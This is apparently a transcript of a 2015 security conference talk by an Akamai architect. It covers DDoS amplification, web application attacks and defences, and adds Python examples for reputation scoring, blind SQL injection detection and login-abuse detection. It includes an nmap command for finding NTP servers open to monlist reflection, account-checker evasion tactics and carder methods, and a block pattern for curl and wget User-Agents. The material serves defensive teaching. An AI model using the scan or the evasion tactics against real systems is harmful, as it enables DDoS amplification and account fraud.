@NTXISSA #NTXISSACSC3
Cyber Warfare: Identifying Attackers
Hiding Amongst the Flock
Anthony Lauro
Sr. Enterprise Security Architect
Akamai Technologies, Inc
October 3rd, 2015
Who am I? (unphilosophically speaking)
About me:
• Anthony Lauro | CISSP, GWAPT
• Sr. Enterprise Security Architect, Akamai Technologies, Inc
• 16 years Information Security Experience
• Advise Akamai clients on Cybersecurity Resilience
• Lead Application Security training for Enterprise Security Architecture team @Akamai
• Attended CCCC a long, long time ago…
There are no rules of
architecture for castles in the
clouds.
-Gilbert K. Chesterton
THREAT LANDSCAPE
Evolving Attack Campaigns
Timeline, Q1 2013 to Q4 2013:
• 190 Gbps attack against US financial institution
• Account Checker (eCommerce)
• Largest DNS reflection attack, 167 Gbps
• Operation Ababil (Financial Services)
• Record number of DDoS attacks in Q3 13
Top 10 Target Countries for Web Application Attacks
Q1 2015
Top 10 Source Countries for Web Application Attacks
Q1 2015
Attacks Grow Because Methods Improve
• Traditional DDoS attacks used compromised home computers
• ‘Cloud’ based DDoS attacks harness the scale of global botnets
• Amplification attacks target protocol vulns to amplify size
• SNMP (6.3x)
• DNS (28x-54x)
• CharGEN (358.8x)
• NTP (556.9x)
[Chart: peak DDoS attack size per year, 2005 to 2014 (estimated), in Gbps and Mpps; the largest rises to 320 Gbps]
You Don’t Have to Be Elite Anymore:
“You can do it, we can help”!
Infrastructure Attacks: Smoke Screen?
WHAT MOTIVATES THE THREAT ACTOR?
[Diagram: hacked web server]
Are You Prepared?
There Are No Immunities Between Verticals
Source: www.informationisbeautiful.net/
2014 Attack Trends
• Top three attack vectors are application layer attacks
• Defacement leads as the top attack, followed by SQLi and Account Hijacking as the most prevalent attacks seen in 2014
Source: Stateoftheinternet.com
Login Abuse: Account Checker Attacks
The fuel for any account checker is a list of credentials.
Fortunately for attackers, there are a huge number of credentials
that are public.
• 38,000,000 Adobe accounts
• 318,000 Facebook accounts
• 70,000 Google accounts
• 60,000 Yahoo accounts
• 22,000 Twitter accounts
• 8,000 ADP accounts
• 8,000 LinkedIn accounts
DEFENSIVE
Techniques
A Castle
Built in 1385 as a defense against the French during the Hundred Years' War
• Acts as a gateway
• Defensive resources become limited
• Entry and exits cannot coexist
WEB SECURITY
Common Approaches
Common Approaches to Web Security
Build It | Buy Boxes | Deny the Problem
DO NOTHING
Approaches for Web Security
• On-Premise Hardware: router, firewall, load balancer, bandwidth
• Application Protection Cloud Service: cloud platform
• ISPs: Internet Service Providers
On-Premises Web Security Approach
On-Premise Hardware: router, firewall, load balancer, bandwidth
• Bandwidth Constraint
• Connection & Processing Limitations
• Application Vulnerability Exploitation: “Have to ingest ALL traffic before a Yes/No decision can be made”
• Performance Degradation: throughput of devices cannot meet the volume / requests per second of good and bad traffic spikes.
• Reliability & Accuracy: WAF configurations are complex, often not tuned properly or not in blocking mode.
“I put the WAF on a SPAN port. I was afraid of blocking legitimate traffic!”
“How did this breach occur? We have a WAF!!”
Internet Service Provider Approach
ISPs (Internet Service Providers)
• DDoS Only Protection
• False Positives / Upstream Blacklisting
• Single-Homed Protection
• Carrier Dependent Architecture
• Capacity Issues At Scale
“Those are birds… Right?”
“I forgot my shield!”
Application Protection Cloud Service Approach
Application Protection Cloud Service: cloud platform
• Direct-to-Origin DDoS Protection Gap
• Shared Infrastructure (Capacity Constraints)
• Acceptable Use Monitoring Challenge
• Retaining Real-time Visibility
• Not Always Enterprise Class Protection
“In other words, careful where you aim that gun,
#OpISIS, because it might point back at you as
well.” -Mike Masnick TechDirt
MULTI PERIMETER
DEFENSE
For Internet-facing Applications
[Diagram: User → Internet → Datacenter]
• DNS: finding the application
• Web: retrieval and integrity of content and data
• Origin: supporting infrastructure and other applications
Multiple Perimeters
For Internet-facing Applications
Volumetric Protection
• Massive resiliency
• Thousands of points of presence
• Distributed geographically
• Rate controls for noisy requestors
Attacks Against CNAMEs
• Network and application layer filtering capable
• Protocol validation/Filtering
• SSL decrypt – re-encrypt
• Geo Sensing and Filtering Capable
• Capacity: Throughput & P/ps
Attacks Against Datacenter IP’s
• Direct to origin protection using BGP redirection
• Multiple globally distributed scrubbing centers
• Attack capacity to withstand multiple attacks at once
• Good traffic bypass so as not to degrade performance
Multiple Perimeters
For Internet-facing Applications
Application Layer Attacks
SSL decryption at scale
Risk scoring rule sets
Tune accuracy over time
Attacks Against DNS
Rate Controls - Connection Throttling
White Listing
Application Inspection
DNSSEC
Client/Server Locks
Anycast Responses
Event Visibility
Threat intel gathered and validated against global dataset
Real-Time event correlation between security policies
Ability to identify hosts based on previous malicious behavior
Import log feed from ‘cloud’ into internal SIEM for correlation
HOW DO YOU IDENTIFY & CLASSIFY
THERE’S A DIFFERENCE BETWEEN
VISIBILITY & INSIGHT
CLIENT REPUTATION SCORING
• Use behavioral data to protect your castle
• Collect and correlate attack traffic into a large dataset from across the web
• Identify bad clients based on past behavior
• Define a risk score for malicious clients
• Filter malicious clients based on risk score
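As an added illustration of the scoring pipeline above (example code, not Akamai's implementation): events from several protected sites are pooled, each client's evidence is weighted by category and decayed with age, breadth across sites raises the score, and the score drives an allow / challenge / deny decision. The category weights, half-life, thresholds and event data are constructed assumptions.

```python
"""Client reputation scoring over a pooled, cross-site attack dataset."""
from collections import defaultdict
from dataclasses import dataclass
import math

# Weight per event category (illustrative assumptions, not Akamai's values).
CATEGORY_WEIGHT = {
    "waf_sqli": 3.0,       # SQL injection rule fired
    "waf_rfi": 3.0,        # remote file inclusion rule fired
    "rate_limit": 1.0,     # exceeded a rate control
    "login_failure": 0.5,  # failed login against a protected site
}
HALF_LIFE_HOURS = 24.0     # past behaviour loses half its weight every 24 h


@dataclass(frozen=True)
class Event:
    ts_hours: float   # when it happened, hours since a fixed epoch
    client_ip: str
    site: str         # which protected site observed it
    category: str


def decayed_weight(event, now_hours):
    """Category weight, halved for every HALF_LIFE_HOURS of age."""
    age = max(0.0, now_hours - event.ts_hours)
    return CATEGORY_WEIGHT[event.category] * 0.5 ** (age / HALF_LIFE_HOURS)


def score_clients(events, now_hours):
    """Return {client_ip: risk score in [0, 10]}.

    Evidence is the decayed sum of weights; a breadth factor rewards clients
    seen attacking several distinct sites, which is what a dataset gathered
    "from across the web" can see and a single site's logs cannot. The total
    is squashed to 0..10 so thresholds stay stable as data volume grows.
    """
    evidence = defaultdict(float)
    sites = defaultdict(set)
    for ev in events:
        evidence[ev.client_ip] += decayed_weight(ev, now_hours)
        sites[ev.client_ip].add(ev.site)
    scores = {}
    for ip, total in evidence.items():
        breadth = 1.0 + math.log2(len(sites[ip]))   # 1 site -> 1.0, 4 sites -> 3.0
        scores[ip] = round(10.0 * (1.0 - math.exp(-total * breadth / 10.0)), 2)
    return scores


def filter_decision(score, deny_at=7.0, challenge_at=4.0):
    """Map a score to the action taken on the client's next request."""
    if score >= deny_at:
        return "deny"
    if score >= challenge_at:
        return "challenge"
    return "allow"


NOW_HOURS = 48.0
# Constructed events pooled from three fictional protected sites.
SAMPLE_EVENTS = (
    # fresh SQLi probes against three different sites an hour ago
    [Event(47.0, "203.0.113.10", s, "waf_sqli")
     for s in ("shop-a", "bank-b", "news-c") for _ in range(2)]
    # the same behaviour, but two days old: decay pulls it below "deny"
    + [Event(0.0, "192.0.2.200", s, "waf_sqli")
       for s in ("shop-a", "bank-b", "news-c") for _ in range(2)]
    # three RFI attempts against a single site four hours ago
    + [Event(44.0, "192.0.2.55", "shop-a", "waf_rfi") for _ in range(3)]
    # an ordinary user who mistyped a password twice
    + [Event(47.5, "198.51.100.7", "shop-a", "login_failure") for _ in range(2)]
)

if __name__ == "__main__":
    ranked = sorted(score_clients(SAMPLE_EVENTS, NOW_HOURS).items(),
                    key=lambda kv: -kv[1])
    for ip, score in ranked:
        print(f"{ip:15} score={score:5.2f} -> {filter_decision(score)}")
```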
Information vs. Intelligence
Information | Intelligence
Raw, unfiltered feed | Processed, sorted information
Aggregated from virtually every source | Aggregated from reliable sources and cross-correlated for accuracy
May be true, false, misleading, incomplete, relevant or irrelevant | Accurate, timely, complete, assessed for relevancy
Not actionable | Actionable
InfoSec teams are swimming in data.
More raw “information” is not the solution.
Threats Change/Advance Over Time
Unique Shellshock payloads per day:
9/24 (Shellshock disclosed): 53
9/25: 11,008
9/26: 16,135
9/27: 21,359
9/28: 15,071
9/29: 30,427
9/30: 69,226
10/1: 124,625
CASE STUDIES
APPLICATION / DDoS ATTACKS
Case Study: 320 Gbps DDoS Attack:
Gaming Vertical, APAC Region
• Largest attack ever mitigated by Akamai
against single customer
• Targeted primary website, supporting
network infrastructure, and DNS
• Multiple attack vectors:
• SYN/UDP floods - entire subnet
• Volumetric attack against DNS
• Attack characteristics:
• 320 Gbps and 71.5 Mpps peak traffic
• 2.1 million requests/s against DNS
[Chart: attack peaks over the campaign, start to end: Infrastructure (Gbps), Web (Gbps), authDNS (Mpps), DNS Reflection (Mpps)]
One Attack in a Broader DDoS Attack Campaign
21+ day campaign against single customer
• 39 distinct attacks targeting applications and DNS infrastructure
• Eight attacks >100 Gbps including record 320 Gbps attack
Opening Ceremony / 1st day of sports
• 132 BILLION requests processed by our WAFs (10x more than 2010 Winter Olympics)
• WAF rules triggered: 127x more than 2010 Winter Olympics
• Custom Rules Triggered: 166,000,000
• Rate Controls (Adaptive Rules) Triggered: 5,600,000
• Requests Denied: 182,200,000
[Charts: attack traffic over time around the opening ceremony and the Spain to Netherlands, Chile to Australia, and Ivory Coast to Japan matches]
Web Application Attacks by Industry – Q1 2015
The Attack du jour?
• Reflection attack
• Mostly SNMP v2c devices (~3+ years old) with default “public” community string
• Routers, printers, cable modems, NAS
• New tool automates sending getBulkRequest to open SNMP servers.
• Flood of SNMP GetResponse data sent from reflectors to victim on port 80
• SNMP query begins at highest (OID) tree level to obtain largest possible response
Case Study: NTP Attacks on Origin
500X RETURN RATE IN TRAFFIC
>100 GBPS ATTACK TRAFFIC AGAINST ORIGIN
1,000+ INCREASE IN HITS PER SECOND AGAINST ORIGIN
Attack Vector
Request with spoofed source IP of target server sent to a vulnerable NTP server that allows the monlist function.
NTP server replies back to the target IP, direct to origin, at massive scale.
Use nmap NSE Script: identify vulnerable hosts
Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>
• The monitor list in response to the monlist command is limited to 600 associations.
• The monitor capability may not be enabled on the target, in which case you may receive an error number 4 (No Data Available).
• There may be a restriction on who can perform Mode 7 commands (e.g. "restrict noquery" in ntp.conf), in which case you may not receive a reply.
• This script does not handle authenticating, and targets expecting auth info may respond with error number 3 (Format Error).
SSDP aka uPnP (Universal Plug and Pray)
[Capture: SSDP 200 OK response]
DNS Attack Targeting Akamai Customer
• DNS requests peaked at 168k per second.
• 19B hits in 5 days. Normally serve ~30M hits per week.
DNS Hijack Attacks: Common Tactic for Middle Eastern Attackers
[Screenshot: US DoD’s DNS hijacked]
Best Practice DNS Locks
• Client DNS Locks
  • clientUpdateProhibited
  • clientTransferProhibited
  • clientDeleteProhibited
• Registrar Locks
  • serverUpdateProhibited
  • serverTransferProhibited
  • serverDeleteProhibited
Remote File Inclusion
RFI attempt to pull click.php file from a remote location, using the RFI vuln in the TimThumb plugin
Here’s what click.php is really about!
HTTP(S) redirections can fluctuate between 14-20 different pay4click companies and advertisers, and that means precious bitcoin revenue for the attacker and his friends.
http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/
When good things go bad:
Rogue Reseller to Competitor
“After years of this relationship we recently found that they now have a copycat site and are selling
our products that they are now manufacturing on their own.” – Enterprise Manufacturing Customer
“At first they were just scraping our site and we saw it to be mutually beneficial…”
Blind SQL Injection: Time Based Attack
This type of blind SQL injection relies on making the database pause for a specified amount of time and examining the result. Using this method, an attacker enumerates each letter of the desired piece of data.
[Capture: client request]
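An added detection example (not from the slides) for the technique described above: rather than matching payload strings, it looks for the timing fingerprint time-based blind SQLi leaves in access logs, namely one client sending many distinct query variants to one endpoint whose response times split into a normal cluster and a second cluster sitting a fixed delay above baseline. The log format, thresholds and log lines are constructed.

```python
"""Behavioural detection of time-based blind SQL injection from access logs."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import median, pstdev
import re

MIN_REQUESTS = 20        # per (client, endpoint) before a judgement is made
DELAY_FLOOR_MS = 2000    # a "slow" response sits at least this far above baseline
CLUSTER_SPREAD_MS = 300  # slow responses must group tightly (a fixed sleep)
MIN_SLOW_FRACTION = 0.2  # some probed conditions are true, so a share is slow


@dataclass(frozen=True)
class Hit:
    ip: str
    path: str
    query: str
    latency_ms: int


# Constructed format: <ip> "<path>?<query>" <latency_ms>
LINE_RE = re.compile(r'^(\S+) "([^?" ]+)(?:\?([^" ]*))?" (\d+)$')


def parse(lines):
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ip, path, query, lat = m.groups()
            hits.append(Hit(ip, path, query or "", int(lat)))
    return hits


def baseline_latency(hits):
    """Per-endpoint median latency across all clients (robust to outliers)."""
    by_path = defaultdict(list)
    for h in hits:
        by_path[h.path].append(h.latency_ms)
    return {p: median(v) for p, v in by_path.items()}


def detect(hits):
    """Return {(ip, path): {"slow_fraction", "delay_ms", "variants"}} for
    clients whose traffic shows the two-cluster timing pattern."""
    base = baseline_latency(hits)
    groups = defaultdict(list)
    for h in hits:
        groups[(h.ip, h.path)].append(h)
    suspects = {}
    for (ip, path), hs in groups.items():
        if len(hs) < MIN_REQUESTS:
            continue
        slow = [h.latency_ms for h in hs if h.latency_ms - base[path] >= DELAY_FLOOR_MS]
        frac = len(slow) / len(hs)
        # short-circuit keeps pstdev() away from an empty list
        if frac < MIN_SLOW_FRACTION or pstdev(slow) > CLUSTER_SPREAD_MS:
            continue
        suspects[(ip, path)] = {
            "slow_fraction": round(frac, 2),
            "delay_ms": int(round(median(slow) - base[path])),
            "variants": len({h.query for h in hs}),   # distinct probes sent
        }
    return suspects


def build_sample_log():
    """Constructed lines: 40 ordinary shoppers, then one enumerating client."""
    lines = [f'198.51.100.{10 + i % 8} "/product?id={100 + i}" {80 + (i * 7) % 50}'
             for i in range(40)]
    # Each probe differs slightly (the next character being guessed) and the
    # response is either quick (condition false) or ~5 s slower (true).
    for i in range(40):
        extra = 5000 if i % 3 == 0 else 0
        lines.append(f'203.0.113.42 "/product?id=PROBE{i}" {90 + (i * 11) % 40 + extra}')
    return lines


if __name__ == "__main__":
    for key, info in detect(parse(build_sample_log())).items():
        print(key, info)
```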
SQL Injection Analysis
2000 customers over one week
Protocol Breakdown
Protocol | SQL Injection Attacks | %
HTTP | 8,137,681 | 96.6
HTTPS | 287,808 | 3.4
Total | 8,425,489 | 100
[Chart: Breakdown by Intent]
Source: Akamai CSI
CMD INJECTION
Remote File Inclusion
[Capture: attack request and client info]
“Credentials” Cookie Value Exposure
ACCOUNT CHECKERS: CARDERS
Several techniques are used to avoid detection and mitigation, including:
● Randomization of UserAgent header
● Targeting of alternative (mobile/API/legacy) login pages, which may have weaker mitigation controls and are often overlooked by the customer.
● Attacks originate from highly distributed set of IP addresses, with different source countries.
● Use of low request rates to evade rate controls.
● Change in order of headers.
● Changes in tactics when 403 responses are received.
Fraud – Vietnamese Carders
Carder TTP
• Build Tools Server
• Cultivate List of Open Proxies
• Acquire Compromised Logins
• Check/Alter Compromised Accounts
• Make Fraudulent Purchases
• Cash out/Resell gift cards
Login Abuse: THE STRUGGLE IS REAL
You know who you are!
Login Abuses: TTPs and Defenses
Rate controls to block fast moving scripts
• Attack relies on being able to check thousands of accounts quickly
• Blocking aggressive scripts prevents login exploitation
Internal monitoring for changes to customer accounts
• Email address
• Shipping address
• Same email on multiple accounts
Geo blocklists for areas where there is no business
• Cuts down on the places attackers can launch from
• Do cloud server providers need to access your webpage?
Custom rules to block User-Agent strings (or lack thereof)
• Attack scripts are often simple and will contain only “curl” or “wget”
• Sometimes none at all
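The defenses listed above, together with the account-checker evasion techniques listed earlier (distributed sources, low per-IP rates, alternative login pages), as an added detection example that is not part of the slides: it runs each rule over constructed login log lines and also flags the distributed, low-rate pattern a plain per-IP rate control cannot see. The log format, thresholds, geo blocklist and tool User-Agent list are assumptions.

```python
"""Login-abuse detection rules run over constructed login log lines."""
from collections import Counter, defaultdict
from dataclasses import dataclass
import re

RATE_WINDOW_S = 60          # sliding window for the per-IP rate control
RATE_LIMIT = 5              # failed logins per IP per window before blocking
GEO_BLOCKLIST = {"ZZ"}      # assumption: placeholder code for a no-business region
TOOL_UA = re.compile(r"^(curl|wget)/", re.I)   # bare scripting tools named on the slide


@dataclass(frozen=True)
class LoginEvent:
    ts: int
    ip: str
    country: str
    ua: str
    path: str
    status: int


# Constructed log format: <epoch> <ip> <country> "<user-agent>" <path> <status>
LINE_RE = re.compile(r'^(\d+) (\S+) (\S+) "([^"]*)" (\S+) (\d{3})$')


def parse(lines):
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts, ip, cc, ua, path, status = m.groups()
            events.append(LoginEvent(int(ts), ip, cc, ua, path, int(status)))
    return events


def failed(ev):
    return ev.status == 401


def rate_control(events):
    """IPs whose failed logins exceed RATE_LIMIT inside any RATE_WINDOW_S window."""
    per_ip = defaultdict(list)
    for ev in events:
        if failed(ev):
            per_ip[ev.ip].append(ev.ts)
    flagged = set()
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] >= RATE_WINDOW_S:
                start += 1
            if end - start + 1 > RATE_LIMIT:
                flagged.add(ip)
                break
    return flagged


def user_agent_rule(events):
    """IPs that send no User-Agent at all, or only a bare tool name."""
    return {ev.ip for ev in events if ev.ua == "" or TOOL_UA.match(ev.ua)}


def geo_rule(events):
    """IPs from regions where the business has no users."""
    return {ev.ip for ev in events if ev.country in GEO_BLOCKLIST}


def distributed_low_rate(events, min_ips=10, max_per_ip=2):
    """The checker pattern a per-IP rate control misses: many IPs, each with
    only a few failures, all sharing one (login page, User-Agent) fingerprint."""
    fails = [ev for ev in events if failed(ev)]
    per_ip = Counter(ev.ip for ev in fails)
    ips_per_fp = defaultdict(set)
    for ev in fails:
        ips_per_fp[(ev.path, ev.ua)].add(ev.ip)
    hits = {}
    for fp, ips in ips_per_fp.items():
        quiet = {ip for ip in ips if per_ip[ip] <= max_per_ip}
        if len(quiet) >= min_ips:
            hits[fp] = quiet
    return hits


def alternate_login_paths(events):
    """Failed logins hitting non-primary (mobile/API/legacy) login pages."""
    return Counter(ev.path for ev in events if failed(ev) and ev.path != "/login")


def build_sample_log():
    """Constructed log lines, not real traffic."""
    lines = [
        '1000 198.51.100.4 US "Mozilla/5.0 (Windows NT 10.0)" /login 200',
        '1001 198.51.100.4 US "Mozilla/5.0 (Windows NT 10.0)" /login 401',
    ]
    # A fast script: eight failures in sixteen seconds with a bare curl UA.
    lines += [f'{1000 + 2 * i} 203.0.113.9 US "curl/7.64.1" /login 401' for i in range(8)]
    # One client from the blocked region, no User-Agent, legacy login page.
    lines.append('1050 192.0.2.77 ZZ "" /legacy/signin 401')
    # A distributed checker: twelve IPs, two slow failures each, mobile login
    # page, spread over several placeholder source countries (C0..C3).
    for n in range(12):
        for k in range(2):
            lines.append(f'{1100 + 30 * n + k} 198.18.{n}.{n + 1} C{n % 4} '
                         f'"Mozilla/5.0 (iPhone)" /m/login 401')
    return lines
```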
DD4BC: (DDoS for Bitcoin)
• Industries affected
• Payment Processing
• Banking & Credit Unions
• Gambling
• Oil & Gas
• E-Commerce
• High Tech Consulting/Services
• Attack Types
• Booter / stresser sites most likely culprit
• Reflection Attacks
Looking Forward into 2015
• Industry Verticals
• Gaming, Fiserv, Internet & Telecom, Software & Tech, and Media verticals expected
to be targeted heavily in 2015
• Security vulnerabilities continue to increase due to bespoke/custom applications
• Good history of successful attacks
• DDoS Attacks
• Expect more ‘mega’ attacks > 100Gbps
• Commoditization of DDOS attacks
• IPv6 uptake to increase DDoS vector
• Never pay ransoms, but do have a plan
• APPLICATION ATTACK TRENDS
• APPSEC IS FAILING – NEED HELP!
• IF YOU DON’T HAVE AN APPSEC PROGRAM
START ONE!
• INJECTION & XSS RIDE OWASP TOP 10
• SESSION MGMT – YOU’RE DOING IT WRONG
• DEVELOPERS – YOU’RE BEHIND!
Cyber Security Requirements: 5 Points To Take Away
1. You Need ‘Validated’ Data: to derive intelligence on current & evolving threats.
2. Scale, Availability & Resilience: to be high performing, take the punches, & stay online.
3. A Plan: to understand how to respond to bad day scenarios.
4. Control & Flexibility: to adapt your defenses dynamically.
5. People & Experience: to execute every time you come under attack.
RESOURCES
OWASP: OPEN WEB APPLICATION SECURITY PROJECT
https://www.owasp.org/index.php/Main_Page
BSIMM5: BUILDING SECURITY IN MATURITY MODEL v5
https://www.bsimm.com/
SANS SWAT: SECURING WEB APPLICATION TECHNOLOGIES v1.1
http://software-security.sans.org/resources/swat
CERT: SECURE CODING STANDARDS
http://www.cert.org/secure-coding/research/secure-coding-standards.cfm?
AKAMAI TECHNOLOGIES (HEY, WHY NOT)
https://www.akamai.com/us/en/cloud-security.jsp
Tony Lauro | CISSP, GWAPT
Senior Enterprise Security Architect
@tonylauro
The Collin College Engineering Department
Collin College Student Chapter of the North Texas ISSA
North Texas ISSA (Information Systems Security Association)
NTX ISSA Cyber Security Conference – October 2-3, 2015
Thank you

NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New World
 
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
NTXISSACSC4 - Intellectual Property Protection― Cross Roads between Ethics, I...
 

Recently uploaded

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 

NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro

  • 1. @NTXISSA #NTXISSACSC3 Cyber Warfare: Identifying Attackers Hiding Amongst the Flock Anthony Lauro Sr. Enterprise Security Architect Akamai Technologies, Inc October 3rd, 2015
  • 2. Who am I? (unphilosophically speaking) About me: Anthony Lauro | CISSP, GWAPT; Sr. Enterprise Security Architect, Akamai Technologies, Inc; 16 years information security experience; advises Akamai clients on cybersecurity resilience; leads application security training for the Enterprise Security Architecture team at Akamai; attended CCCC a long, long time ago…
  • 3. There are no rules of architecture for castles in the clouds. -Gilbert K. Chesterton
  • 6. Evolving Attack Campaigns (timeline, Q1 13 through Q4 13): 190 Gbps attack against a US financial institution; Account Checker (eCommerce); largest DNS reflection attack, 167 Gbps (Financial Services); Operation Ababil; record number of DDoS attacks in Q3 13. [Remaining timeline labels are not recoverable from the slide image.]
  • 7. Top 10 Target Countries for Web Application Attacks, Q1 2015 [chart]
  • 8. Top 10 Source Countries for Web Application Attacks, Q1 2015 [chart]
  • 9. Attacks Grow Because Methods Improve: Traditional DDoS attacks used compromised home computers. 'Cloud' based DDoS attacks harness the scale of global botnets. Amplification attacks abuse protocol weaknesses to multiply attack size (bandwidth amplification factor, i.e. response bytes per request byte): SNMP (6.3x), DNS (28x-54x), CharGEN (358.8x), NTP (556.9x). [Chart: peak DDoS attack size per year, 2005 through 2014 (estimated), in Gbps and Mpps.]
  • 10. You Don't Have to Be Elite Anymore: "You can do it, we can help"!
  • 11. Infrastructure Attacks: Smoke Screen? [Pie chart of attack share by category; segment labels are not recoverable from the slide image.]
  • 12. WHAT MOTIVATES THE THREAT ACTOR? [Diagram: hacked web server]
  • 14. There Are No Immunities Between Verticals. Source: www.informationisbeautiful.net/
  • 15. 2014 Attack Trends: The top three attack vectors are application layer attacks. Defacement leads as the top attack, followed by SQLi and account hijacking as the most prevalent attacks seen in 2014. Source: Stateoftheinternet.com
  • 16. Login Abuse: Account Checker Attacks. The fuel for any account checker is a list of credentials. Fortunately for attackers, there are a huge number of credentials that are public: 38,000,000 Adobe accounts; 318,000 Facebook accounts; 70,000 Google accounts; 60,000 Yahoo accounts; 22,000 Twitter accounts; 8,000 ADP accounts; 8,000 LinkedIn accounts
  • 18. A castle built in 1385 as a defense against the French during the Hundred Years' War
  • 19. Acts as a gateway; defensive resources become limited; entry and exit cannot coexist
  • 21. Common Approaches to Web Security: build it; buy boxes; deny the problem
  • 23. Approaches for Web Security: on-premise hardware (router, firewall, load balancer, bandwidth); application protection cloud service (cloud platform); ISPs (Internet service providers)
  • 24. On-Premises Web Security Approach (router, firewall, load balancer, bandwidth):
    • Bandwidth constraint
    • Connection and processing limitations
    • Application vulnerability exploitation: "Have to ingest ALL traffic before a Yes/No decision can be made"
    • Performance degradation: throughput of devices cannot meet the volume / requests per second of good and bad traffic spikes
    • Reliability and accuracy: WAF configurations are complex, often not tuned properly or not in blocking mode
  • 25. "How did this breach occur, we have a WAF!!" / "I put the WAF on a SPAN port. I was afraid of blocking legitimate traffic!" (A WAF fed from a SPAN port sees only a copy of the traffic: it can log and alert, but it cannot block anything.)
  • 26. Internet Service Provider Approach: DDoS-only protection; false positives / upstream blacklisting; single-homed protection; carrier-dependent architecture; capacity issues at scale
  • 28. Application Protection Cloud Service Approach: direct-to-origin DDoS protection gap; shared infrastructure (capacity constraints); acceptable use monitoring; challenge retaining real-time visibility; not always enterprise class protection
  • 29. "In other words, careful where you aim that gun, #OpISIS, because it might point back at you as well." -Mike Masnick, TechDirt
  • 33. For Internet-facing Applications (diagram: user, Internet, datacenter): Web: retrieval and integrity of content and data; Origin: supporting infrastructure and other applications; DNS: finding the application
  • 34. Multiple Perimeters for Internet-facing Applications
